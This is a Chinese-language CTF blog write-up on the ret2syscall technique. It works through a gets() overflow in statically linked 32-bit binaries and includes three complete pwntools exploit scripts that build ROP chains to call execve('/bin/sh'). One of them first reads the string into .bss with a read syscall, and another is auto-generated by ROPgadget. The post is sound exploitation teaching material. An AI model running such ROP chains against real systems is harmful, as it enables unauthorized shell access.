再识ret2syscall

　　当初学rop学到的ret2syscall，对int 0x80中断了解还不是很深，这次又复习了一遍。虽然很简单，但是还是学到了新东西。那么我们就从ret2syscall开始吧。

　　IDA一打开的时候，就看见函数窗口有超级多的函数，我就意识到，应该是静态编译。这样软件就没调用libc，也就不存在leak libc版本来获取shell地址了。记得以前做过的一道静态编译，利用的是ROPgadget。刚刚试了一下，发现这道题也可以，这个我们最后说。

　　IDA打开后搜索字符串，发现“/bin/sh”字样，但是没有system函数。那么我们就想到用系统调用的方法来拿到shell。系统调用需要一个函数就是int 0x80，我们用ROPgadget来搜索一下。

　

　　截图中我们有了int 0x80的地址和“/bin/sh”的地址，再获取一些给寄存器赋值的gadget就可以写exp了，这里就直接贴上exp了。

from pwn import *

p = process('./ret2syscall')

binsh_addr = 0x080be408
pop_eax = 0x080bb196
pop_edx_ecx_ebx = 0x0806eb90
int80_addr = 0x08049421

payload = 'a'*112 + p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0x0) + p32(0x0) + p32(binsh_addr) + p32(int80_addr)

p.sendline(payload)
p.interactive()

　　这是我第一次学习时候的ret2syscall的时候的exp，当我今天又遇到一个这种类型的题。我们来细细看一下。

　　

　　

　　直接main函数一个gets溢出，然后就没了。这道题是直接搜不出“/bin/sh”字符串的。但是其实如果真的掌握精髓的话，其实是可以拼接出“/bin/sh”字符串的，因为我搜了一下，有“/”，有“bin”，有“sh”，但是我拼接过程中不知道该如何截断一个字符串。那么我们还能怎么办呢？既然是系统调用，那么我们不如调用一个read函数，来自己输入“/bin/sh”吧。

　　自己输入“/bin/sh”的话，就需要我们调用两次int 80，但是，却怎么也打不通。

　　

　　这时候有师傅告诉我说，用ROPgadget这样搜索，搜出来也是系统调用，我怀着疑惑，用qira看一下。

　　

　　我们调用了两次int80，但是汇编只显示了一行，经过调试发现，当read执行完，执行shellcode的时候又会跳到第一个int80来系统调用。

　　那我们再看一下，第一次搜索出来的int80为啥不行。。。

　　

　　发现这样调用之后，任务直接就中断了，就不会继续执行了。。。

　　那么就总结出来了，如果只需要一次系统调用，可以用这种命令：ROPgadget --binary rop --only 'int'

　　如果我们需要多次系统调用，就只能用这个命令来找int 0x80 ：ROPgadget --binary rop --opcode cd80c3

　　本题如果我们要自己输入“/bin/sh”的话，就需要用这个找到的地址了。

　　那么我们贴一下这道题的exp：

 

from pwn import *
import time

p = process('./rop')
#p = remote('127.0.0.1',4000)
elf = ELF('./rop')
context.log_level = 'debug'

pop_eax_edx_ebx = 0x08053d14
pop_ecx = 0x080595b3
ret = 0x080481b2
#int80 = 0x0806c405   #int80
int80 = 0x0806ef00     #ROPgadget --binary rop --opcode cd80c3
buf = elf.bss() + 0x300
payload = 'a'*22
payload += flat([
    pop_eax_edx_ebx,
    0x3,
    0x10,
    0x0,
    pop_ecx,
    buf,
    int80,
    pop_eax_edx_ebx,
    0xb,
    0x0,
    buf,
    pop_ecx,
    0x0,
    int80])
p.sendline(payload)
sleep(1)
p.send('/bin/sh\x00')
sleep(1)
p.sendline('cat flag.txt')
p.recv()
p.close()

 

　　说到这里，其实也该完了，但是我发下ROPgadget是真的牛逼。他还有这么一行命令：

　　

ROPgadget --binary rop --ropchain

 

　　这行命令，会自己从程序里面找gadget片段，然后拼接出shellcode，如果这道题用这种方法做，我贴一下exp：

 

from pwn import *
from struct import pack
import time

z = process('./rop')
#p = remote('127.0.0.1',4000)
elf = ELF('./rop')
context.log_level = 'debug'

p = 'a'*22

p += pack('<I', 0x0806e7da) # pop edx ; ret
p += pack('<I', 0x080ec080) # @ .data
p += pack('<I', 0x080b90f6) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x08054642) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e7da) # pop edx ; ret
p += pack('<I', 0x080ec084) # @ .data + 4
p += pack('<I', 0x080b90f6) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x08054642) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e7da) # pop edx ; ret
p += pack('<I', 0x080ec088) # @ .data + 8
p += pack('<I', 0x08049173) # xor eax, eax ; ret
p += pack('<I', 0x08054642) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ec080) # @ .data
p += pack('<I', 0x080595b3) # pop ecx ; ret
p += pack('<I', 0x080ec088) # @ .data + 8
p += pack('<I', 0x0806e7da) # pop edx ; ret
p += pack('<I', 0x080ec088) # @ .data + 8
p += pack('<I', 0x08049173) # xor eax, eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x080be674) # inc eax ; ret
p += pack('<I', 0x0806c405) # int 0x80
z.sendline(p)
z.interactive()
    

 

　　payload直接用自动生成的就可以，仔细阅读一下自动生成的，发现就是都是利用片段拼接，而且只调用了一次int 0x80，调用的这次也是咱们那个只能用一次的int 0x80的那个地址。这样，这种题目就算是分析透彻了。

　　当然这种直接生成的payload一般都比较长，适用于gets函数，我做了一道题是read，因为限制长度就不能用。

　　好了，分析就到这了。